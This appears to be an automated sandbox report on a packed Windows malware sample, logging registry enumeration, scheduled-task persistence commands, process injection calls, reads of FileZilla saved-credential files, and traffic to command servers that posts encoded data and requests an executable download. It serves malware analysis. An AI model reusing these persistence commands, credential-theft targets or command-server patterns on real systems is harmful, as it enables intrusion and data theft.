RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x0000051c key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000004e8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: AddressBook base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: Connection Manager base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: DirectDrawEx base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: EditPlus base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: ENTERPRISE base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: Fontcore base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: Google Chrome base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: IE40 base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Sept. 6, 2023, 7:41 a.m.	regkey_r: IE4Data base_handle: 0x000004e8 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

The executable is likely packed with VMProtect (3 events)

section	.vmp0	description	Section name indicates VMProtect
section	.vmp1	description	Section name indicates VMProtect
section	.vmp2	description	Section name indicates VMProtect

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 0c912b13a1c82db75810fb98a197d7b3ecbdace7

Communicates with host for which no DNS query was performed (10 events)

host	176.123.9.85
host	185.225.74.51
host	185.225.73.32
host	193.42.32.118
host	208.67.104.60
host	45.15.156.229
host	45.9.74.80
host	85.208.136.10
host	94.142.138.131
host	94.156.253.187

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 6, 2023, 7:41 a.m.	process_identifier: 2608 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000074	1	0	0

Checks the version of Bios, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Installs itself for autorun at Windows startup (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Network communications indicative of possible code injection originated from the process services.exe (39 events)

Time & API	Arguments	Status	Return
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: okd÷®"!¬O¬AøS³úFé¼õrn\ °Ýù·/5 ÀÀÀ À 28*ÿtelegram.org socket: 384		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: 51d÷®#ðYGË/7öÝ´Ó+ºdÿcæ>Ã%ÆBê ÿ socket: 384		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: njd÷®#ç;Î~TPîÈ(ÛÐÔÂ·ÜN®imÀà/5 ÀÀÀ À 28)ÿtwitter.com socket: 496		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: 51d÷®#V(OâÔ´`â»íqÇüÑY×\|TÝl ÿ socket: 496		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: lhd÷®$}¥SU}?{ùu¯£ÈÉi"S>ÆK.ª]ïà/5 ÀÀÀ À 28'ÿ yandex.ru socket: 500		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: FBAlÀÐÎïN,4¤nÃü½q5®ïÓ²Û÷òsáya"RÉËç·5¦Ý[BañNÂÞw£G¸cÊm6ô"ú9}0èj»ë¿l»Ú°ë:¹ãñ-¿ýS rëÎ ÑºYØ{;Çë@¿Âåæ Ùl socket: 500		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: àêÃÍ_ÅºªÙìF3>Ëw¬MÆÆ`Í%fI¦XãÝðH_Í©Kòü¯ÛåC3\|ÅÂíÛ 5NûD`v«>&ç¹ÍuLy#Ü£á\åYÈ?V6£qÑséP¥½³®ýÌä'ÞèvL½ïÈ+) 6æ_bztkqxÖ¥vøüè\|Ëz×RÏgØ8æ'çá/ÑK@À'-âIéÿÊÙ]$é¯È§¿ MÏS^* ¾0×`MÝÍ dÆ socket: 500		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: jfd÷®%Ùý{¾0ìFÀæoÀ%Æpå±}å°~/5 ÀÀÀ À 28%ÿ dzen.ru socket: 920		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: FBAUæA »µN°7¬ÆËoIÑ<LgÿëwcÉK®Öû*®Ëæ yÍÊH0¿½ÍGa¥'0ªú7%{Oê¯©TÄwT/õe<îîr±ÉvÈ¦ª?Dl½Ñu1r/Ôì socket: 920		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: àåkÌÍ¬®ÔêFýï¯\|lÎjé<ÍHßõS[çÅåæÞ<wR«tD¼ôaônÕÈI[Xo`^BÎTÆ®¨ñM<àròH«Üh÷´Hæ·kè#²`³Ýþv*þíUÙ´ämZÆåè!è÷§Õ¬ÏZxÿgl÷´¬HÍl¢#_¸þMùïºÒY`h÷Ýn&ÝïöZásÎÿ<û7æüsèùvëÊÕäIUÄÅÜøoGÕÞ¢<m;Ø+o»fØ socket: 920		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: yud÷®'¸fFjo¿îlSkm*ÄA£ú¦M\|ÖÜ/5 ÀÀÀ À 284ÿsso.passport.yandex.ru socket: 924		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: FBAq°æ6¿°.¬Ic+}Àøð½Øúmë§ÜFnÃr2Å¥- ÿ/6º²Ø6¡s\|û8¿³0EÃ)£^Ã¬Aµ«~ó;¼N¾¬·#\|^øòùpdâÎ9È¾° socket: 924		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: @uÍ×B5 Yoéì2íÿÃ°y(»Øgÿª=l¾×¯( :Í°ÚOGÂY³ ½\Âý³>îd+VÌ@´GËu¼r¯ëÝ&Î<I äUGHÃ{4§EGPâDCkÔUG¸Óa7´ÿ"Ô9ý5=1]i_Ë[©¦þáÀ1ÊHHí^1ÜÖcòB: ùÍ:ì.÷ÒÄÕÂ®w@D©Ço)5MJíÄuÝ:.89LáÌIPìp±ûøx¶ª·~pÇüöã'N%~¥5(h8MDji½úæO/H·á!mB6Ýb¦kë¼;<J»µ·@\LÍ÷ÀQ=¯á/2xâ ÂÌy§WFvÞ°Ðð ¼ùÒ>OÂj²÷äþþ?.\|Èb/eg©z´WWà;ùEJ]DÐi¤äòßá å©åEiaÜ<l¢b²ûÿòU'PûliWàaIîá«Ö3»ÒÍ0Håêqªj»pÖÚÂ{DáßÚÓOÇoÀdAAÇ+iR¸(®SþmZWÈd±äÅ6ÙVè0È°Oé²'\@ø©¹#vÛeú©7ã6k@ [¯%òhìÕFýKgÉRQÏA2ÑðÌWñ:¿à(æÍøä÷Þ¨ socket: 924		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: o¾?¹by:Ùy¦DËLIÏ69¨Y«^®¤ socket: 924		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: møzú³ùµ¶'ìµycÖã²f=ýò·Ã. socket: 924		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 193.42.32.118 socket: 936		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: njd÷®,íySe*ðXÍ}á¤Éw O¦²/5 ÀÀÀ À 28)ÿironhost.io socket: 940		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: FBA1Ã6ÏÊh¯êªÉT§ ¤VÚS÷5fvàÎ¦ë¤ öpI@At6&ZÿÑy®,Ý°38°¦JîÂ60¨ ìW]w^8çñleÈph«½_Ø×oÌ"ÅøÎ#ÅP³tH\õ©äüäá socket: 940		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 996		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 94.142.138.131 socket: 940		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 94.142.138.131 socket: 940		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: data=m7moirmur7WzsqDt8u4= socket: 940		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: lhd÷®-§#!8ö9{ÔøÆÀ¿G BÛDbG¶%N/5 ÀÀÀ À 28'ÿ ipinfo.io socket: 1016		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: 51d÷®-ý¢¿ð8@2n(ÿóðøvi$öAg7x ÿ socket: 1016		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: lhd÷®-_BÆSºÕ¤ìÜÏü/WÅËÆó"ý#z[Û/5 ÀÀÀ À 28'ÿ db-ip.com socket: 1020		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: FBAÏÃ%ª¥Ü¼0©Ü{¾ÃîM³=Ïë¯ÂCïj}$CQtmæqðpÒ¡YóÕw5ÿç kMS¨0·m¼VP)åùçm!êÁøÖÖ,Ìæ÷Îm··OF¾Û2+fpXZxÏÍ7¥Íb socket: 1020		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: à)Ú¢ØX¡þnÎ0?d&x#YûfPKMØ/»rÙ4"fjwãCXnPõ÷G`iÂ®1n3¤ûÓzBLwðïx`#V¥FDÝªù\×ÌÓK:ÿ4n¶ÐµoÃ3°+íÍÑÍÄyP¸Æ¯>PõBLï^a«,·WbÉµÏÃzBæëà-æÍÜ{èPI=lÃe 'Ö¿¿î¯cþ³Êl"$³yéÃ1~ <thXY)¹>qÌðÙ¦IewÅ_bç, socket: 1020		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: pld÷®-½ú=p ÅD¹(Ø³%73aLæ6°bÆÛt-/5 ÀÀÀ À 28+ÿ api.db-ip.com socket: 1008		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: FBA[ü,«âvNÒ>Ò4íÎc¤yåjF´º_18c/`Ð!%Ôeoyma[Øýa²0x49 ÅÖAî]×ì"X£fny© &çZ¦úÛdÀr¿m´_]@h59Å z¸ socket: 1008		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: @dÀRF¾$/ìK÷Ãû>Y3n§~l<eÄ(P7.é¾!lXôó cPðß¨µÑYç/]¯9t~[;§G¨Þ+£ñTügR=3d(Ö,3Va]@ýÔioMVÏNC±ý:µqÐÝ®¬í@a!ø ÎÎî<ø45ÚÔF°=ØcñO)ôóõÜYëâ,I\|k°6p;ÒbeÚ ù.§T¸¥Â&MôLWçAØª\|ÑÈtÉµ<[ÁNRõÖ¹¹zzÍ¸«È5PL¦Ä$fR5[ûª Ãwr\|déþPÆ"ô1·»0LE}Û jÜüíÌ8íã^ÖÿäiGwQ×/$+ýoÃ]x'°ê¾d/ ¢$Æ\|ÿã: socket: 1008		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com socket: 1040		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: rnd÷®-ìg7K.²ªmW(ÇhZfeøw3ß/Õ/5 ÀÀÀ À 28-ÿwww.maxmind.com socket: 1044		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: 51d÷®.ÉT?MéþG²íhzÅï~Uã6óÊá ÿ socket: 1044		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 94.142.138.131 socket: 940		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: data=m7molYw= socket: 940		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 94.142.138.131 socket: 940		0
WSASend Sept. 6, 2023, 7:39 a.m.	buffer: data=m7mokLO9uLmukLWyt6C4uem57-W_5L7lvurkvr_uv-657-3ovum97b_s6OrluKA= socket: 940		0
InternetConnectA Sept. 6, 2023, 7:39 a.m.	username: service: 3 hostname: 94.156.253.187 internet_handle: 0x00cc0004 flags: 0 password: port: 80	1	13369352
HttpOpenRequestA Sept. 6, 2023, 7:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: HEAD referer: path: /download/WWW14_n.exe	1	13369356

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 6, 2023, 7:41 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2608 process_handle: 0x00000074	1	1	0

Collects information about installed applications (50 out of 54 events)

Time & API	Arguments	Status
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
